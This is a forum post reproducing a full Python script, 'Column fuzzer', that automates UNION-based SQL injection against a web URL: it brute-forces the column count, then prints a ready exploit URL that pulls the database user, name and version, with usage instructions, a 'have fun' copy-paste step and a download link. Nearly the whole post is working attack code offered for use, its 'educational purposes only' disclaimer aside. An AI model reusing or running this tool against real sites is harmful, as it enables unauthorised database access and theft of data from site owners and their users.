Nytro Posted June 11, 2014 Report Posted June 11, 2014 Column fuzzer# Full Automated Column Finder for SQL Injection# Column fuzzer, version 1.1 (23th May 2010)# By Valentin Hoebel (valentin@xenuser.org)# ASCII FOR BREAKFAST## Useful for SQL Injections. The script tries to determine the amount# of columns needed for a successfull SQL Injection, e.g.# target/index.php?id=1+AND+1=2+UNION+SELECT+1,2--#!/usr/bin/python# Full Automated Column Finder for SQL Injection# Column fuzzer, version 1.1 (23th May 2010)# By Valentin Hoebel (valentin@xenuser.org)# ASCII FOR BREAKFAST## Useful for SQL Injections. The script tries to determine the amount# of columns needed for a successfull SQL Injection, e.g.# target/index.php?id=1+AND+1=2+UNION+SELECT+1,2--## You may copy, modify and use this code without asking me for permission# Share it, use it!# For educational purposes only. I am not responsible for any damage you might# cause with this script.## Thanks to rsauron from darkc0de for the awesome Python scripts!# Greetz to cr4wl3r (you know why ! ) && all my friends and ppl who support me!### Usage: python column_finder.py -u http://target-domain.tld/file.php?some_var=some_integer# Example:# python column_finder.py -u http://127.0.0.1/index.php?=id=1# Don't forget to supply a correct value for the var or script won't work (e.g. id=1, but NOT id=)!### Changelog:# -------------------------------------------------# Version 1.1 - 23th May 2010# - Some small changes## Version 1- 22th May 2010# - Public releaseimport sys, re, urllib, urllib2, stringfrom urllib2 import Request, urlopen, URLError, HTTPError# Define the max. amounts for tryingmax_columns = 100# Prints usagedef print_usage(): print "" print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>" print "Full Automated Column Finder for SQL Injection by Valentin Hoebel (valentin@xenuser.org)" print "Version: 1.1 (23th May 2010)" print "Usage:" print " -u <URL> (e.g. -u http://target/index.php?id=1)" print " --help (displays this text)" print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<" print "" print "" return#Prints bannerdef print_banner(): print "" print "" print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>" print "" print "Full Automated Column Finder for SQL Injection" print "by Valentin Hoebel (valentin@xenuser.org)" print "" print "Version: 1.1 (23th May 2010)" print "" print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<" print "" return# Testing if URL is reachable, with error handlingdef test_url(): print ">> Checking if connection can be established..." try: response = urllib2.urlopen(provided_url) except HTTPError, e: print ">> The connection could not be established." print ">> Error code: ", e.code print ">> Exiting now!" print "" sys.exit(1) except URLError, e: print ">> The connection could not be established." print ">> Reason: ", e.reason print ">> Exiting now!" print "" sys.exit(1) else: valid_target = 1 print ">> Connected to target! URL seems to be valid." print "" return# Find correct amount of columns for the SQL Injectiondef find_columns(): # Define some important variables and make the script a little bit dynamic number_of_columns = 1 column_finder_url_string = "+AND+1=2+UNION+SELECT+" column_finder_url_message = "0x503077337220743020743368206330777321" column_finder_url_message_plain = "P0w3r t0 t3h c0ws!" column_finder_url_terminator = "--" next_column = "," column_finder_url_sample = "concat(user(),database(),version())" print ">> Trying to find the correct number of columns..." # Craft the final URL to check final_check_url = provided_url+column_finder_url_string+column_finder_url_message for x in xrange(1, max_columns): # Visit website and store response source code of site final_check_url2 = final_check_url+column_finder_url_terminator response = urllib2.urlopen(final_check_url2) html = response.read() find_our_injected_string = re.findall(column_finder_url_message_plain, html) # When the correct amount was found we display the information and exit if len(find_our_injected_string) != 0: print ">> Correct number of columns found!" print ">> Amount: ", number_of_columns # Ask if a sample URL should be provided user_reply = str(raw_input(">> Do you want to have a sample URL for exploiting? (Yes/No) ")) if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes": print "" # Print a sample URL for exploiting and replace test string with some useful stuff print string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample) print "" print "Simply copy and paste this link into your browser Have fun! Bye :)" print "" print "" sys.exit(1) else: print ">> Ok, bye =)" print "" print "" sys.exit(1) # Increment counter var by one number_of_columns += 1 #Add a new column to the URL final_check_url += next_column final_check_url += column_finder_url_message # If fuzzing is not successfull print this message print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?"# Checking if argument was providedif len(sys.argv) <=1: print_usage() sys.exit(1)for arg in sys.argv: # Checking if help was called if arg == "--help": print_usage() sys.exit(1) # Checking if URL was provided, if yes -> go! if arg == "-u": provided_url = sys.argv[2] print_banner() # At first we test if we can actually reach the provided URL test_url() # Now start with finding the correct amount of columns find_columns() print "" print ""### EOF ###Download: http://xenuser.org/tools/column_finder.py Quote
